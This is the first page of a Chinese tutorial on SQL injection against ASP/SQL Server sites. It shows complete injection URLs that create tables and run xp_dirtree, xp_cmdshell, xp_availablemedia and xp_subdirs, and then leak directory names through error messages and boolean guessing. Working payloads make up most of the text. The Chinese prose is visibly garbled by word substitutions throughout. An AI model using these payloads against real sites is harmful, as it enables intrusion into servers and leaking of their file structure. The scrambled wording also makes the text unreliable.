|
假如网站只开了80端口,你会发明下面的要领是较量有效的,其顶用的要领险些都不是我发明的,文中包罗一些注入时的小我私人履历和能力 ,要领可以说有4种(此刻已知的)
第一种要领:
这个是<<独特的SQL注入>>中先容的要领
操作sqlserver的xp_dirtree,好的我们先来将一下要领,然后再说其是非处(在原文的基本上作了点增补)
成立表
语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
返回:正常的信息!声名建表乐成!继承!
(建的比原文的大一点,由于我遇过名子很长的文件,删除了谁人id,由于没有什么用
语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:' --
返回:正常信息。声名写入C盘的全部目次乐成了!爽!接下来就是取表了!暴它出来。(仿佛只有暴这种要领了)
语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 '@Inetpub'转换为数据范例为 int 的列时产生语法错误。
再依次爆出表中的目次名称!
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub'))--
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 'test'转换为数据范例为 int 的列时产生语法错误。
再依次爆出表中的目次名称!
好我们继承
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub','test'))--
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 'haha'转换为数据范例为 int 的列时产生语法错误。
再依次爆出表中的目次名称!
好了,你应该知道怎么做了吧,哈哈,就是把获得的表名添到谁人括号里,有几多就放几多吧,
一点能力:
偶然辰你会发明当输入相同
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
时不是表现堕落,而是网页表现正常
晕了吧,别求助哈
看看0<>(select top 1 paths from dirs) 声名返回是一个数字,
哈哈,测试一下看看是几多吧
100>(select top 1 paths from dirs)
返回正常
哈哈,用这种大于小于的要领很快就能猜出了
好我们继承
好比当呈现
59=(select top 1 paths from dirs)
返回正常,
ok,声名名字是59
输入如下
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '59'))--
记得带上引号哟
下面的要领就和原本的一样的了
尚有一个题目就是
偶然辰用上面的要领输入59时,发明下一次的文件夹照旧59
这个是怎么回工作呢?
呵呵,不知道你有没有留意过059和59是一样的?
就是这个缘故起因了,哈哈,
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '059'))--
发明昭示下一个文件夹名字了,ok
优弱点说明:
利益就是全部的sqlserver用户都可以行使,由于xp_dirtree合用权限PUBLIC,
弱点是表现的是目次下的全部文件夹的名字,并且分列仿佛是没有什么次序的,总之在好几千好几万个文件夹里找你想要的文件夹是疾苦的.
并且你知道了有谁人文件夹也不能担保在根目次下,其实是疾苦的一件工作呀,许多时辰是靠命运和耐力.
祝你乐成 要领二:
操作xp_cmdshell
哈哈,这个各人必然很认识了吧,我就简朴说一下
成立表
语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--
返回:正常的信息!声名建表乐成!继承!
(建的比原文的大一点,由于我遇过名子很长的文件,删除了谁人id,由于没有什么用
语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'dir c: /B/D' --
返回:正常信息。声名写入C盘的全部目次乐成了!这里用了dir c: /B/D,哈哈,不知道/B/D什么浸染就试验试验看
语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 '@Inetpub'转换为数据范例为 int 的列时产生语法错误。
再依次爆出表中的目次名称!
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from
dirs where paths not in( '@Inetpub'))--
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 'test'转换为数据范例为 int 的列时产生语法错误。
再依次爆出表中的目次名称!
要领同上,就不说了
偶然辰我们也可以用下面的两个扩展来干些工作
1)我们可以操作xp_availablemedia来获适合前全部驱动器,并存入dirs表中:
5 ;insert dirs exec master.dbo.xp_availablemedia;--
我们可以通过查询temp的内容来得到驱动器列表及相干信息
(2)我们可以操作xp_subdirs得到子目次列表,并存入dirs表中:
5 ;insert into dirs exec master.dbo.xp_subdirs 'c:' ;--
优弱点说明:
很明明晰,这样就不会呈现xp_dirtree那种全部目次都放在一路的环境了,只会表现一级目次,找起来利便多了.
弱点也很明明,只有sa有这个权限,也有也许打点员删除了这个扩展(事实太强盛了).
[1] [2] [3] 下一页 (编辑:湖南网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
